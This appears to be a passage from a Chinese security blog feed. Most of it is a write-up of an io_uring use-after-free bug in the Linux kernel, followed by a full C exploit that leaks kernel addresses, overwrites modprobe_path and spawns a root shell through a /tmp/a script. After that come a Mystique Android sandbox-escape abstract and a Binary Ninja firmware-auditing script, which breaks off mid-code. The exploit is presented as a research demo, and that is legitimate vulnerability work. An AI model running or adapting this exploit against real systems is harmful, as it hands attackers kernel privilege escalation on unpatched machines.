static __cold int io_init_bl_list(struct io_ring_ctx* ctx)
{
    int i;

    //指向64个struct io_buffer_list
    ctx->io_bl = kcalloc(BGID_ARRAY, sizeof(struct io_buffer_list), GFP_KERNEL);
    if (!ctx->io_bl)
        return -ENOMEM;

    //初始化每一个struct io_buffer_list
    for (i = 0; i < BGID_ARRAY; i++) {
        INIT_LIST_HEAD(&ctx->io_bl[i].buf_list);    //缓冲区链表头
        ctx->io_bl[i].bgid = i; //buffer list的组id
    }

    return 0;
}

正常的是右边的操作, 但是这里是左边的操作. 由于slab会根据bl&(~size的掩码)找到要释放的对象, 因此整个io_bl都会被释放掉, 从而造成后续的UAF漏洞

该漏洞在2022年5月13日在这个commit中引入, 还是十分新的

漏洞利用

由于io_buffer_list的结构与msg_msg结构类似, 因此exp的主要思路就是通过通过UAF的io_buffer_list对象来控制msg_msg, 详细的可以看EXP代码, 其中注释比较详细

exp思路如下

利用UAF让io_buffer_list与msg_msg重叠, 将其称为msg0, 然后向其中添加一个io_buffer对象, 该对象会被当做消息队列中的另一个msg_msg, 称为msg1, 读出msg1从而泄露kmalloc-2k的地址,
- 这里需要注意, 由于msg1并不来自slub, 而是直接从页分配器分配的页, 因此在读出msg1时通过一个循环指针, 让store_msg()在遍历msg->next时一直循环, 从而避免被释放掉
拥有kmalloc-2k的地址后, 结合msg_msg的堆喷射就可以伪造io_buffer_list对象, 利用kvfree(bl->buf_pages); 获取kmalloc-2k上的任意地址free, 然后打出对象重叠
堆布局msg0 | msg2 | io_ring_ctx, 其中msg0+0x60~msg2+0x60称为msg3, 就是之前被free的, 释放msg3再申请到就可以控制msg2->m_ts进行越界读, 读出io_ring_ctx对象就可以泄露内核地址
然后重新使用msg3控制msg2, 进行取出msg_msg的list_del()操作进行unlink attack实现任意地址写入8B, 修改modprobe_path完成提权

上述利用过程没法绕过freelist随机化, 并且在复杂堆环境下是十分不稳定的, 并不能作为实际攻击用的exp, 仅作为漏洞演示

演示视频:

EXP

下面这个exp在内核没有开启freelist随机化的情况下, 使用busybox文件系统在简单的内核环境下可以进行提权

#define _GNU_SOURCE

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/*------------------------助手定义-----------------------------*/
typedef unsigned long long uLL;
typedef long long LL;
#define PAGE_SIZE (0x1000)

#define LOG(val) printf("[%s][%s][%d]: %s=0x%llx\n", __FILE__, __FUNCTION__, __LINE__, #val, (uLL)val)

void Hexdump(char* buf, long size)
{
    for (int i = 0; i < size; i += 8)
        printf("+%02x\t0x%016llx\n", i, *(uLL*)(buf + i));
}

//映射可读可写页, 并进行写入, 使其存在
void* Mmap(void* base, size_t len)
{
    int flags = MAP_ANONYMOUS | MAP_PRIVATE;
    if (base)
        flags |= MAP_FIXED;

    void* res = mmap(base, len, PROT_READ | PROT_WRITE, flags, -1, 0);
    if ((LL)res == -1 || (base && (res != base))) {
        perror("Mmap");
        exit(-1);
    }
    memset(res, '\x00', len);
    return res;
}

// kmalloc(buf, KERNEL); 写入buf; 然后kfree(buf)
void spray(char* buf, long size)
{
    setxattr("/exp", "XXXXX", buf, size, XATTR_CREATE);
    perror("setxattr");
}
/*------------------------助手定义-----------------------------*/

/*------------------------io_uring相关定义-----------------------------*/
int io_uring_setup(unsigned entries, struct io_uring_params* p)
{
    return (int)syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_register(unsigned int fd, unsigned int opcode,
    void* arg, unsigned int nr_args)
{
    return (int)syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int io_uring_enter(int ring_fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags)
{
    return (int)syscall(__NR_io_uring_enter, ring_fd, to_submit, min_complete, flags, NULL, 0);
}

#define IORING_REGISTER_PBUF_RING (22)
#define IORING_UNREGISTER_PBUF_RING (23)

#define IORING_OP_PROVIDE_BUFFERS (31)

//注册一个缓冲区, mapped ring使用
struct io_uring_buf_reg {
    __u64 ring_addr;
    __u32 ring_entries;
    __u16 bgid;
    __u16 pad;
    __u64 resv[3];
};

//新内核中sqe的定义
struct new_io_uring_sqe {
    __u8 opcode; /* type of operation for this sqe */
    __u8 flags; /* IOSQE_ flags */
    __u16 ioprio; /* ioprio for the request */
    __s32 fd; /* file descriptor to do IO on */
    union {
        __u64 off; /* offset into file */
        __u64 addr2;
        __u32 cmd_op;
    };
    union {
        __u64 addr; /* pointer to buffer or iovecs */
        __u64 splice_off_in;
    };
    __u32 len; /* buffer size or number of iovecs */
    union {
        __kernel_rwf_t rw_flags;
        __u32 fsync_flags;
        __u16 poll_events; /* compatibility */
        __u32 poll32_events; /* word-reversed for BE */
        __u32 sync_range_flags;
        __u32 msg_flags;
        __u32 timeout_flags;
        __u32 accept_flags;
        __u32 cancel_flags;
        __u32 open_flags;
        __u32 statx_flags;
        __u32 fadvise_advice;
        __u32 splice_flags;
        __u32 rename_flags;
        __u32 unlink_flags;
        __u32 hardlink_flags;
        __u32 xattr_flags;
        __u32 close_flags;
    };
    __u64 user_data;
    union {
        __u16 buf_index;
        __u16 buf_group;
    } __attribute__((packed));
    __u16 personality;
    union {
        __s32 splice_fd_in;
        __u32 file_index;
    };
    union {
        struct {
            __u64 addr3;
            __u64 __pad2[1];
        };
        __u8 cmd[0];
    };
};

//这个对象只在内核中定义, 问了方便伪造对象我将其复制到这里
struct io_buffer_list {
    union {
        struct {
            void* buf_pages;
            void* buf_ring;
        };
    };
    __u16 bgid; // buffer group ID

    //下面这些字段是io_register_pbuf_ring()使用的
    __u16 buf_nr_pages; // bu_pagesf中有多少页
    __u16 nr_entries; //包含多少项
    __u32 head;
    __u32 mask;
};

//内存屏障宏
#define io_uring_smp_store_release(p, v)                   \
    atomic_store_explicit((_Atomic typeof(*(p))*)(p), (v), \
        memory_order_release)

#define io_uring_smp_load_acquire(p)                 \
    atomic_load_explicit((_Atomic typeof(*(p))*)(p), \
        memory_order_acquire)

/*------------------------io_uring相关定义-----------------------------*/

void clean_slab_4K(void)
{
    int msgid[0x10];
    int ret;
    for (int i = 0; i < 0x10; i++) {
        msgid[i] = msgget((key_t)1000 + i, 0666 | IPC_CREAT | IPC_EXCL);
        LOG(msgid[i]);
        struct msgbuf* msg = malloc(PAGE_SIZE * 2 + 0x30);

        puts("msgsnd");
        msg->mtype = 0x1;
        memset(msg->mtext, '\x00', PAGE_SIZE * 2);
        ret = msgsnd(msgid[i], msg, PAGE_SIZE * 2, 0);
    }

    char* res = malloc(PAGE_SIZE * 2);
    for (int i = 0; i < 0x10; i++) {
        ret = msgrcv(msgid[i], res, PAGE_SIZE * 2, 0x1, 0);
    }
}

/*------------------------初始化函数-----------------------------*/
int uring_fd;
int msgid[0x10];
char* buffer; //公共使用的缓冲区
#define BUFFER_LEN (PAGE_SIZE * 8) //公共缓冲区长度
#define PBUF_BASE ((void*)0x1000) //缓冲区的IORING_OP_PROVIDE_BUFFERS提供的缓冲区地址
struct new_io_uring_sqe* sqes; //提交项数组

unsigned *sring_tail, *sring_mask, *sring_array, *cring_head;

void init(void)
{
    setbuf(stdout, NULL);

    struct io_uring_params p;
    memset(&p, 0, sizeof(p));
    uring_fd = io_uring_setup(0x1, &p); //只设置一项

    // SQ映射长度=io_urings中sq_array的偏移+sq_array的项数*index长度
    int sring_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned);

    // CQ映射长度=io_urings中cqes的偏移+cqes的项数*完成项的长度
    int cring_sz = p.cq_off.cqes + p.cq_entries * sizeof(struct io_uring_cqe);

    // 提交队列项的长度
    int sqes_sz = p.sq_entries * sizeof(struct new_io_uring_sqe);

    //映射提交队列相关字段
    unsigned char* sq_ptr = mmap(NULL, sring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING);
    LOG(sq_ptr);

    sring_tail = (unsigned int*)(sq_ptr + p.sq_off.tail); //指向io_urings.sq.tail
    sring_mask = (unsigned int*)(sq_ptr + p.sq_off.ring_mask); //指向io_urings.sq_ring_mask
    sring_array = (unsigned int*)(sq_ptr + p.sq_off.array); //指向io_urings中, cqes后面的sq_array

    // 映射sqes
    sqes = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES);
    LOG(sqes);

    //映射完成队列
    unsigned char* cq_ptr = mmap(NULL, cring_sz, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING);
    LOG(cq_ptr);

    cring_head = (unsigned int*)(cq_ptr + p.cq_off.head); //完成队列头

    // 创建许多消息队列备用
    for (int i = 0; i < 0x10; i++) {
        msgid[i] = msgget((key_t)1234 + i, 0666 | IPC_CREAT | IPC_EXCL);
        // LOG(msgid[i]);
    }

    //分配公用的缓冲区
    buffer = Mmap(0, BUFFER_LEN);
    if (buffer == NULL) {
        perror("malloc buffer");
    }
}
/*------------------------初始化函数-----------------------------*/

void* worker(void* res)
{
    /*
        从msgid[0]中读入一个msg_msg,
        但是由于后一个io_buffer.list.prev会被当做msg_msg->next, 导致load_msg()无限循环
        因此需要单独开一个线程阻塞在内核态, 但实际上数据是已经写入到res中的
    */
    msgrcv(msgid[0], res, PAGE_SIZE, /* msg_type= */ (long)PBUF_BASE, 0);
    puts("shouldn't get here");
}

void trigger_UAF(void)
{
    int ret;

    //准备一个无效的mapped ring请求
    struct io_uring_buf_reg reg;
    memset(®, 0, sizeof(reg));
    reg.ring_addr = 0xF00000000; // invaild userspace address, 令io_pin_pages()失败
    reg.ring_entries = 0x20000000; // power of 2
    reg.bgid = 0x0;

    // ctx->io_bl = kcalloc(BGID_ARRAY, sizeof(struct io_buffer_list), GFP_KERNEL);
    // kfree(ctx->io_bl);
    ret = io_uring_register(uring_fd, IORING_REGISTER_PBUF_RING, ®, 1);
    LOG(ret);
}

void submit_provide_buffer(void)
{
    io_uring_smp_store_release(&sring_array[0], 0); //写入sq_array

    //更新sqes的tail
    int tail = *sring_tail;
    tail++;
    io_uring_smp_store_release(sring_tail, tail);

    //提交1个请求, 要求完成这一个后再返回
    int ret = io_uring_enter(uring_fd, 1, 1, IORING_ENTER_GETEVENTS);
    LOG(ret);

    //回收cqe
    int head = io_uring_smp_load_acquire(cring_head);
    head++;
    io_uring_smp_store_release(cring_head, head);
}

//在msgid[idx]中分配num个大小为size的msg_msg对象
void alloc_msg(int idx, int size, int num)
{
    struct msgbuf* msg = (struct msgbuf*)buffer;
    int msg_len = size - 0x30;
    LOG(msg_len);

    memset(msg->mtext, 0xCC, msg_len);
    for (int i = 0x0; i < num; i++) {
        msg->mtype = i + 1;
        if (msgsnd(msgid[idx], msg, msg_len, 0) != 0)
            perror("msgsnd");
        LOG(i);
    }
}

int main(void)
{
    int ret;
    init();

    // 1. 令ctx->io_bl指向0x800的UAF对象
    trigger_UAF();

    /*  2. 将ctx->io_bl指向的0x800的对象作为msg_msg对象, 称为msg0 */
    struct msgbuf* msg = (struct msgbuf*)buffer;
    // 要分配的大小 - sizeof(struct msg_msg), 0x420会从kmalloc-2k中分配.
    // 不分配0x800是为了partial overwrite, 保留可用的io_bufer_list
    int msg_len = 0x420 - 0x30;
    msg->mtype = 0x0001; // mtype 为long, 低2B对应io_buffer_list的bgid, 高2B对应buf_nr_pages
    memset(msg->mtext, '\x00', msg_len);
    msgsnd(msgid[0], msg, msg_len, 0); //发送消息

    /* 3. 将io_buffer链接到ctx->io_bl[0], 伪造一个msg_msg对象, 称为msg1 */
    // 使用io_provide_buffers()在链表ctx->io_bl[0].buf_list上添加一个io_buffer对象
    // 但是对于msg_msg来说, 添加的io_buffer对象会被当作是msg_msg对象, 从而把0xFD0作为消息正文长度, 泄露io_buffer
    void* pbuf = Mmap(PBUF_BASE, PAGE_SIZE); //上交的缓冲区
    LOG(pbuf);
    sqes[0].opcode = IORING_OP_PROVIDE_BUFFERS;
    sqes[0].rw_flags = 0;
    sqes[0].splice_fd_in = 0;
    sqes[0].fd = 1; // nbufs
    sqes[0].addr = (uLL)pbuf; // io_buffer::addr对应msg_msg::m_type, 因此要控制在long的范围内
    sqes[0].len = 0xFD0; // io_buffer::len对应msg_msg::m_ts, 因此io_buffer后续的内容会被当作是消息正文, 等于DATALEN_MSG
    sqes[0].buf_group = 0; //链接到ctx->io_bl[buf_group], 这里0对应msg_msg的头部, 可以伪造msg_msg
    submit_provide_buffer();

    // 4. 从ctx->io_buffer_cache中分配两对象, 获取指向ctx->io_bl[33]的指针, 从而找到kmalloc-2k的地址
    for (int i = 0; i < 0x2; i++) {
        sqes[0].addr = (uLL)malloc(0x100);
        sqes[0].len = 0x100;
        sqes[0].buf_group = 33; // 注意msg_msg覆盖时0x420后面的都是可用的io_buffer_list, 因此链接到这里0x420/0x20=33
        submit_provide_buffer();
    }

    // 5. 创建一个线程读出msg1到buffer中, 从而实现越界读, worker之后会卡死, 只能让其卡死, 因为msg1是伪造的, 不能被kfree掉
    uLL* tag = (uLL*)(buffer + 0xF00); //在尾部打上标记,  因为开头8B是mtype, 读出0xF00的消息会写入0xF08
    *tag = 0xdeadbeef;
    pthread_t th;
    pthread_create(&th, NULL, worker, buffer);

    // 6. 获取ctx->io_bl, 也是msg0的地址
    while (*tag == 0xdeadbeef) // load_msg()执行完毕会覆盖*tag, 这里进行等待
        ;
    // Hexdump(buffer, 0x200);
    uLL io_bl = *((uLL*)(buffer + 0x18)) - 0x420; //减去0x420时因为指向的时&ctx->io_bl[33]
    LOG(io_bl);

    // 7. 在ctx->io_bl(也是msg0)后面申请一个msg2, 并申请io_ring_ctx对象, 在没有开启slub随机化的情况下, 三者是相邻的
    msg_len = 0x800 - 0x30;
    memset(msg->mtext, 0x00, msg_len);
    msgsnd(msgid[2], msg, msg_len, 0);

    int spray_uring_fd;
    struct io_uring_params p;
    memset(&p, 0, sizeof(p));
    spray_uring_fd = io_uring_setup(0x1, &p); //只设置一项
    LOG(spray_uring_fd);

    // 8. 重新覆盖掉ctx->io_bl, 伪造io_buffer_list对象
    ret = msgrcv(msgid[0], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0); //首先读出msg0
    LOG(ret);
    msg_len = 0x800 - 0x30; // 0x800-sizeof(struct msg_msg), 可以伪造io_buffer_list了, 不用partial overwrite

    //将具体msg_msg开头的偏移x 转换为 从msg_msg->mtext开始的索引
#define IDX(x) (((x)-0x30) / 8)

    //在msg_msg.mtext中伪造io_buffer_list对象
    uLL* tmp = (uLL*)msg->mtext; // tmp = ctx->io_bl+0x30, 也等于msg_msg+0x30
    tmp[IDX(0x40)] = io_bl + 0x60; // fake_bl.buf_pages
    tmp[IDX(0x48)] = io_bl; // fake_bl.buf_ring, 指向一个可读地址即可
    tmp[IDX(0x50)] = 0x10000; // fake_bl.buf_nr_pages = 1
    tmp[IDX(0x60)] = io_bl + 0x68; // <= io_bl + 0x60, 这里的值会被当做buf_pages[0]
    tmp[IDX(0x68)] = 0xdeadbeef; //这里被当做page对象

    tmp[IDX(0x80)] = io_bl + 0xa0; // fake_bl.buf_pages
    tmp[IDX(0x88)] = io_bl; // fake_bl.buf_ring, 指向一个可读地址即可
    tmp[IDX(0x90)] = 0x10000; // fake_bl.buf_nr_pages = 1
    tmp[IDX(0xa0)] = io_bl + 0x1000; // <= io_bl + 0x60, 这里的值会被当做buf_pages[0]

    // msgid[0]实际只有一个msg, 但是取出了两次, 导致msq->q_qnum=-1, 因此不能再使用, 换成msgid[1], 反正都是一样的覆盖
    ret = msgsnd(msgid[1], msg, msg_len, 0); //然后再次发送消息
    LOG(ret);

    // 9. 利用__io_remove_buffers()进行任意地址kvfree(), [msg_msg+0x60, msg_msg+0x860)会被放入freelist
    struct io_uring_buf_reg reg;
    memset(®, 0, sizeof(reg));
    reg.bgid = 0x2; // msg_msg中对应fake_bl
    ret = io_uring_register(uring_fd, IORING_UNREGISTER_PBUF_RING, ®, 1);
    LOG(ret);

    // 10. 发送msg3, 申请到[msg_msg+0x60, msg_msg+0x860), 从而控制msg2
    msg_len = 0x800 - 0x30;
    tmp = (uLL*)msg->mtext;
    // msg3+0x800-0x60处就是msg2的头部
    tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; //自旋指针,msg1->next指向这里, worker继续卡死, 不然kfree(msg1)会导致crash
    tmp[IDX(0x800 - 0x60)] = io_bl + 0x830; // msg3.m_list.prev
    tmp[IDX(0x808 - 0x60)] = io_bl + 0x830; // msg3.m_list.next
    tmp[IDX(0x810 - 0x60)] = 0x00001; // msg3.m_type
    tmp[IDX(0x818 - 0x60)] = 0xFD0; // msg3.m_ts
    tmp[IDX(0x820 - 0x60)] = 0; // msg3.next
    tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // msg3.security, 指向可读区域就好

    tmp[IDX(0x830 - 0x60)] = io_bl + 0x800; // <=io_bl + 0x830, 伪造循环链表节点
    tmp[IDX(0x838 - 0x60)] = io_bl + 0x800;
    tmp[IDX(0x840 - 0x60)] = 0xdeadbeef;

    ret = msgsnd(msgid[3], msg, msg_len, 0); //然后再次发送消息, 为了防止干扰, 一个队列发送一个消息
    LOG(ret);

    // 11. 读出msg2, 从而越界读出io_uring_ctx, 泄露kaslr
    msgrcv(msgid[2], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
    uLL* io_ring_ctx = (uLL*)(buffer + 0x8 + 0x800 - 0x30);
    // Hexdump(io_ring_ctx, 0x200);
    LOG(io_ring_ctx[0x420 / 8]); // io_ring_ctx::fallback_work
    LL kaslr = io_ring_ctx[0x420 / 8] - 0xffffffff81083250;
    LOG(kaslr);
    LL modprobe_path = kaslr + 0xffffffff82850e40;
    LOG(modprobe_path);

    // 12. 利用msg3重新覆盖msg2, 伪造msg_msg对象
    // 首先再次发送msg2, 为防止干扰, 发送msgid[4]中
    msg_len = 0x800 - 0x30;
    memset(msg->mtext, 0x00, msg_len);
    msgsnd(msgid[4], msg, msg_len, 0);
    // 然后释放掉msg3
    ret = msgrcv(msgid[3], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
    LOG(ret);
    // 开始构造msg2
    msg_len = 0x800 - 0x30;
    tmp = (uLL*)msg->mtext;
    // msg3+0x800-0x60处就是msg2的头部
    tmp[IDX(0x420 - 0x60)] = io_bl + 0x420; //自旋指针,msg1->next指向这里, worker继续卡死, 不然kfree(msg1)会导致crash
    tmp[IDX(0x800 - 0x60)] = modprobe_path - 0x8; // msg3.m_list.prev
    tmp[IDX(0x808 - 0x60)] = 0x612f706d742f; // msg3.m_list.next = "/tmp/a\x00"
    tmp[IDX(0x810 - 0x60)] = 0x00001; // msg3.m_type
    tmp[IDX(0x818 - 0x60)] = 0xFD0; // msg3.m_ts
    tmp[IDX(0x820 - 0x60)] = 0; // msg3.next
    tmp[IDX(0x828 - 0x60)] = io_bl + 0x840; // msg3.security, 指向可读区域就好

    // 分配msg3, 利用msg3.mtext覆盖掉msg2, 同理为防止干扰, 发送到msgid[5]
    msgsnd(msgid[5], msg, msg_len, 0);

    if (fork() == 0) { //子进程触发unlink attack
        msgrcv(msgid[4], buffer, PAGE_SIZE, /* msg_type= */ (long)0x0001, 0);
    }

    // 13. 等待unlink attack完成, 检查是否覆盖成功
    sleep(2);
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    LOG(fd);
    read(fd, buffer, 0x10);
    puts(buffer);
    close(fd);

    // 14. 构造提权脚本/tmp/a并触发
    fd = open("/tmp/a", O_RDWR|O_CREAT);
    char *script = "#!/bin/sh\nchmod 777 /flag\nsetsid cttyhack setuidgid 0 /bin/sh\n";
    write(fd, script, strlen(script));
    close(fd);
    system("chmod 777 /tmp/a");

    // write a wrong execute file
    int ff = open("/tmp/asd", O_WRONLY | O_CREAT);
    write(ff, "\xff\xff\xff\xff", 4);
    close(ff);

    // trigger modprobe
    system("chmod 777 /tmp/asd; /tmp/asd");
    if(fork()==0)
        system("/bin/sh");

    puts("alive");
    while (1)
        ;

    return 0;
}

总结

抛开具体的漏洞利用技巧, 该漏洞告诉我们新的代码往往是buggy的，需要时间来进行检验才会变的稳定可靠。io_uring作为一个蓬勃发展的模块, 代码量已经膨胀到仅2万行, 在提升IO效率的同时, 其安全性值得关注.

the Mystique Vulnerability White Paper

2022-05-23T11:40:47.000Z

Abstract

The Android Application Sandbox is the cornerstone of the Android Security Model, which protects and isolates each application’s process and data from the others. Attackers usually need kernel vulnerabilities to escape the sandbox, which by themselves proved to be quite rare and difficult due to emerging mitigation and attack surfaces tightened.

However, we found a vulnerability in the Android 11 stable that breaks the dam purely from userspace. Combined with other 0days we discovered in major Android vendors forming a chain, a malicious zero permission attacker app can totally bypass the Android Application Sandbox, owning any other applications such as Facebook and WhatsApp, reading application data, injecting code or even trojanize the application ( including unprivileged and privileged ones ) without user awareness. We named the chain “Mystique” after the famous Marvel Comics character due to the similar ability it possesses.

In this talk we will give a detailed walk through on the whole vulnerability chain and bugs included. On the attack side, we will discuss the bugs in detail and share our exploitation method and framework that enables privilege escalation, transparently process injection/hooking/debugging and data extraction for various target applications based on Mystique, which has never been talked about before. On the defense side, we will release a detection SDK/tool for app developers and end users since this new type of attack differs from previous ones, which largely evade traditional analysis.

Details

the Mystique Vulnerability White Paper
CanSecWest2022 sliders

魔形女漏洞白皮书

2022-05-23T11:25:09.000Z

摘要

Android 应用程序沙箱是 Android 安全模型的基石，它保护并隔离每个应用程序的进程和数据。攻击者通常需要内核漏洞来逃离沙箱，由于新兴的缓解措施和攻击面收紧，这本身被证明是非常罕见和困难的。

但是，我们在 Android 11 稳定版中发现了一个漏洞，该漏洞完全来自用户空间。结合我们在主要Android供应商中发现的其他0day形成链，恶意零权限攻击者应用程序可以完全绕过Android应用程序沙箱，拥有Facebook和WhatsApp等任何其他应用程序，在用户无意识的情况下，读取应用程序数据，注入代码甚至木马化应用程序（包括非特权和特权的）。我们以著名的漫威漫画角色命名该连锁店“Mystique”，因为它拥有类似的能力。

在本次演讲中，我们将详细介绍整个漏洞链和包含的错误。在攻击方面，我们将详细讨论漏洞并分享我们的利用方法和框架，该方法和框架可以实现基于 Mystique 的各种目标应用程序的权限提升、透明进程注入/挂钩/调试和数据提取，这是以前从未讨论过的。在防御方面，我们将为应用程序开发人员和最终用户发布检测 SDK/工具，因为这种新型攻击与以前的攻击不同，很大程度上规避了传统分析。

详细资料

漏洞白皮书报告
 CanSecWest2022 演讲PPT

To be a bug hunter with Binary Ninja in IoT

2022-05-22T16:35:21.000Z

Binary Ninja is an easy-to-use binary analysis platform that provides rich API interfaces to help security researchers perform automated analysis.

中文版

Recently I am doing security research work on various IoT devices, these are mainly routers, NAS, NVR, IP cameras and other products. Normally, I will first try to download the firmware of these products on the Internet, and then use binwalk to unpack and analyze them. Most of them are Linux embedded systems. After obtaining their rootfs, the ELF program inside will be statically processed.

Based on experience, I will focus on the code written by the manufacturer when implementing some specific protocols, such as http, cgi, upnp, netatalk, sslvpn, etc. I have listed some vulnerability prototypes that I will audit during static analysis below. Although the dangerous functions listed below need to be banned in modern software development, due to historical reasons, many IoT devices still have these ancient codes left behind, and there are opportunities to be exploited by attackers.

After sorting out what needs to be done, the work of vulnerability hunting becomes more repetitive. The most time-consuming task is to audit the context when each function is referenced, and then check:

Whether the current function call is safe (especially check whether there is the possibility of buffer overflow)
Can the attacker’s input reach this path

If the above two conditions are met, it is likely that this is a exploitable vulnerability. However, when an ELF is more complex, the call relationship of these high-risk functions will become abnormally many, and it will become quite laborious to rely on human audit. For example, developers of manufacturers especially like to directly call the system function in CGI to realize some tasks, such as restarting the machine, checking updates, etc. Most of the parameters of the system function are beyond the control of the attacker. How we can quickly find the vulnerability that can be controlled by the attacker for command injection?

This obviously involves the category of static analysis. I can conduct a relatively complete analysis of the whole program according to the control flow and data flow, but it requires huge computational power, which is likely to lead to an exponential increase in analysis time. As a vulnerability digger, I am more concerned about how to find exploitable vulnerabilities than absolutely relying on computers to find bugs automatically. I can accept the false alarm generated by automatic analysis. As long as it is more convenient than pressing the X key in IDA for human flesh scanning, it can be regarded as automatic analysis. As for how to reduce its false positive rate, we can make this thing first and then consider this problem.

After investigation, I tried to use angr, IDApython and Ghrida for analysis, but the results were not satisfactory (maybe I was not familiar with the use of these software). Finally, I used binary Ninja to complete a simple automatic analysis tool

from binaryninja import *
from enum import Enum, auto

class Error(Enum):
    FORMAT_UNCONSTANT = auto()
    FORMAT_OVERFLOW = auto()
    STACKOVERFLOW = auto()
    COMMANDINJECT = auto()

def check_system(bv,symbol="system"):
    addr = get_function_addr(bv,symbol)
    if addr == None:
        return []
    refs = bv.get_code_refs(addr)
    ret = []
    for ref in refs:
        func = ref.function
        cmd = func.get_parameter_at(ref.address,None,0)
        if is_constant(cmd):
            continue
        ret.append((symbol,func.name,ref.address,Error.COMMANDINJECT))
    return ret

def get_function_addr(bv,symbol):
    syms = []
    if symbol in bv.symbols:
        syms = bv.symbols[symbol]
    if "_%s"%symbol in bv.symbols:
        syms = bv.symbols["_%s"%symbol]
    for i in syms:
        if "mips32" == bv.arch.name or "mipsel32" == bv.arch.name:
            if i.type == SymbolType.ImportAddressSymbol:
                return i.address
        else:
            if i.type == SymbolType.ImportedFunctionSymbol:
                return i.address
    return None

def is_constant(a):
    return a.type == RegisterValueType.ConstantPointerValue or a.type == RegisterValueType.ConstantValue

if __name__ == "__main__":
    input_file = sys.argv[1]
    if os.path.exists(input_file + ".bndb"):
        bv = open_view(input_file + ".bndb")
    else:
        bv = open_view(input_file)
        settings = SaveSettings()
        bv.create_database(input_file + ".bndb", None, settings)
    ret = check_system(bv)
    for i in ret:
        print("%-15s function: %-20s addr: 0x%x %s"%(i[0],i[1],i[2],i[3]))

The main logic of the above code is in the check_system function. I just filter out the calls whose parameters are not constants when calling system, and finally output all the results. This greatly reduces the number of system calls I need to check. Similarly, I can also check whether there is a risk of buffer out-of-bounds in the call to sprintf through Binary Ninja’s API.

def check_sprintf(bv,symbol = "sprintf"):
    addr = get_function_addr(bv,symbol)
    if addr == None:
        return []
    refs = bv.get_code_refs(addr)
    ret = []
    for ref in refs:
        func = ref.function
        fmt = func.get_parameter_at(ref.address,None,1)
        if not is_constant(fmt):
            ret.append((symbol,func.name,ref.address,Error.FORMAT_UNCONSTANT))
            continue
        asc = bv.get_ascii_string_at(fmt.value,min_length = 2)
        if asc == None:
            continue
        fmt_value = asc.value
        cidx = 0
        arg_idx = 1
        while True:
            idx = fmt_value.find("%",cidx)
            if idx < 0:
                break
            arg_idx += 1
            cidx = idx + 1
            if fmt_value[idx:].startswith("%s"):
                arg = func.get_parameter_at(ref.address,None,arg_idx)
                if not is_constant(arg):
                    ret.append((symbol,func.name,ref.address,Error.FORMAT_OVERFLOW))
    return ret

The false positive rate of the above vulnerability analysis will still be relatively high, based on experience, I often add some additional constraints that do not seem to be particularly correct:

strcpy strcat
Require the dst parameter to be stack space (more likely to appear stackoverflow)
system
Require calls to snprintf or sprintf at the same time as system is called (command injection is more likely)
sscanf
It is required to call sscanf without calling fopen (the developer will use sscanf to read the information in the configuration file)

Through the above constraints, the results of the automatic analysis output can generally be used as a reference for static analysis, but if you want to perform batch firmware analysis, further optimization is required. At present, I am researching how to use Binary Ninja’s intermediate language to conduct a relatively complete data flow analysis to further reduce the false positive rate. If there are other updates, I will synchronize them here. Interested students are also welcome to contact me.

References

使用Binary Ninja进行IoT设备漏洞挖掘

2022-05-22T13:00:59.000Z

Binary Ninja是一款简单易用的二进制分析平台，它提供了丰富的API接口，可以帮助安全研究人员进行自动化的分析。

English version

最近我在进行各种IoT设备的安全研究工作，这些主要是一些路由器、NAS、NVR、IP摄像头之类的产品。通常情况下我会首先尝试去在网上下载这些产品的固件，然后使用binwalk进行解包分析，他们绝大多数都是Linux嵌入式系统，获得了它们的rootfs以后，会对里面的ELF程序进行静态分析。

根据经验，我会重点关注厂商在实现一些特定协议时自己写的代码，如http 、cgi、upnp、netatalk、sslvpn等。我下面列出了静态分析时自己会审计的一些漏洞原型，虽然下面列出的危险函数在现代化的软件开发中需要被禁止使用，但由于历史原因，很多IoT设备上还是会遗留这些古老的代码，存在被攻击者利用的机会。

在理清楚需要做的事情以后，漏洞挖掘的工作就变得比较重复。最费时的任务就是依次去审计每个函数被引用时的上下文，然后去判断：

当前的函数调用是否安全（尤其需要检查是否存在缓冲区溢出的可能）
攻击者的输入是否可以到达这个路径

如果以上两个条件都满足，那么很有可能这就是一个可被利用的漏洞。不过，一个ELF比较复杂时，这些高危函数的调用关系会变得异常多，依靠人力去肉眼审计会变得相当费力。比如厂商的开发人员特别喜欢在cgi里直接调用system函数来实现某些任务，比如重启机器、检查更新等，绝大多数system函数的参数都不是攻击者能够控制的，那么如何能够快速找到那么可以被攻击者控制进行命令注入的漏洞呢？

这显然涉及到了静态分析的范畴，我可以根据控制流、数据流对整个程序进行比较完备的分析，但是这需要耗费巨大的算力，很有可能导致分析时间呈现指数级的增长。作为一名漏洞挖掘人员，我更关心如何找到可以利用的漏洞，而不是绝对地依靠计算机去自动化发现bug。我可以接受自动化分析产生的误报，只要是比起我在IDA里面按下X键进行人肉扫描方便，那么这就可以被认为是自动化分析。至于如何降低它的误报率，可以先把这个东西做出来，再考虑这个问题。

经过调查，我尝试了使用angr、IDAPython、Ghrida进行分析工作，但结果并不太满意（也许是我对这些软件的使用并不太熟悉），最后我使用Binary Ninja完成了一个简单的自动化分析工具

from binaryninja import *
from enum import Enum, auto

class Error(Enum):
    FORMAT_UNCONSTANT = auto()
    FORMAT_OVERFLOW = auto()
    STACKOVERFLOW = auto()
    COMMANDINJECT = auto()

def check_system(bv,symbol="system"):
    addr = get_function_addr(bv,symbol)
    if addr == None:
        return []
    refs = bv.get_code_refs(addr)
    ret = []
    for ref in refs:
        func = ref.function
        cmd = func.get_parameter_at(ref.address,None,0)
